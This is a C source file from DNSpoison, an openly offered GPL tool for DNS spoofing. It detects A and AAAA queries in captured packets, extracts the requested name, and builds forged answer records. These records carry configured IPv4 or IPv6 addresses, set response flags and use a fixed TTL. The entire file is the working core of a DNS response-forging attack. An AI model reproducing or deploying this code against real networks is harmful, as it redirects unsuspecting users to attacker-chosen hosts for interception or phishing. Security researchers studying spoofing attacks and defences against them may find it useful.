/*
 *  DNSpoison
 *  src/dns.c
 *
 *  Copyright (C) 2011
 *
 *  Author: Vilmain Nicolas
 *  Contact: null.sim@gmail.com
 *
 *  This file is part of DNSpoison.
 *
 *  DNSpoison is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  DNSpoison is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with DNSpoison.  If not, see <http://www.gnu.org/licenses/>.
 */

#include  "dnspoison.h"
#include  "dns.h"

static int  is_dns_rr_req (const char *packet);
static void set_static_dns_ans (struct dns_rr_ans_s *rr_ans);

int
packet_is_dns_request (union packet *pkt, char *url)
{
  int ret;
  struct dnshdr_s *dns = NULL;

  dns = (struct dnshdr_s *) (pkt->packet + MIN_PACKET);
  if (dns->orr || dns->opcode
      || !htons (dns->qdcount) || htons (dns->ancount))
    return -1;
  ret = is_dns_rr_req (dns->rr + (strlen (dns->rr) + 1));
  if (ret == -1)
    return -1;
  memset (url, 0, URL_LEN);
  if (strlen (dns->rr) < URL_LEN)
    strncpy (url, dns->rr, strlen (dns->rr));
  else
    strncpy (url, dns->rr, (URL_LEN - 1));
  dns_decode_url (url);
  url[URL_LEN - 1] = '\0';
  return ret;
}

static int
is_dns_rr_req (const char *packet)
{
  int ret;
  struct dns_rr_s  *rr = NULL;

  ret = -1;
  rr = (struct dns_rr_s *) packet;
  if (htons (rr->class) == 1)
    {
      if (htons (rr->type) == 1)
	ret = 4;
      else if (htons (rr->type) == 28)
	ret = 6;
    }
  return ret;
}

void
dns_decode_url (char *url)
{
  size_t i;
  uint8_t offset;

  i = 0;
  offset = (uint8_t) *url;
  while (offset && i < URL_LEN)
    {
      url += (offset + 1);
      offset = (uint8_t) *url;
      *url = '.';
      i++;
    }
  *url = '\0';
}

int
make_dns_header (union packet *pkt, struct url_s *url, int pkt_size, int ipvn)
{
  int i;
  struct dnshdr_s *dns = NULL;
  struct dns_rr_ans_s *rr_ans = NULL;

  if (ipvn == 4)
    {
      for (i = 0; url->ipv4[i]; i++)
	{
	  rr_ans = (struct dns_rr_ans_s *) (pkt->packet + pkt_size);
	  pkt_size += 16;
	  rr_ans->rr.type = htons (1);
	  COPY_IP (rr_ans->rr.un.ipv4, url->ipv4[i]);
	  rr_ans->rr.len = htons (4);
	  set_static_dns_ans (rr_ans);
	}
    }
  else
    {
      for (i = 0; url->ipv6[i]; i++)
	{
	  rr_ans = (struct dns_rr_ans_s *) (pkt->packet + pkt_size);
	  pkt_size += 28;
	  rr_ans->rr.type = htons (28);
	  COPY_IPv6 (rr_ans->rr.un.ipv6, url->ipv6[i]);
	  rr_ans->rr.len = htons (16);
	  set_static_dns_ans (rr_ans);
	}
    }
  dns = (struct dnshdr_s *) (pkt->packet + MIN_PACKET);
  dns->orr = 1;
  dns->rd = 1;
  dns->ra = 1;
  dns->ancount = htons (i);
  return pkt_size;
}

static void
set_static_dns_ans (struct dns_rr_ans_s *rr_ans)
{
  rr_ans->host = htons (0xC00C);
  rr_ans->rr.class = htons (1);
#ifdef __IS_LITTLE_ENDIAN
  rr_ans->rr.ttl = 0xD91D0000;
#elif defined(__IS_BIG_ENDIAN)
  rr_ans->rr.ttl = 0x00001DD9;
#endif /* not __Linux */
}
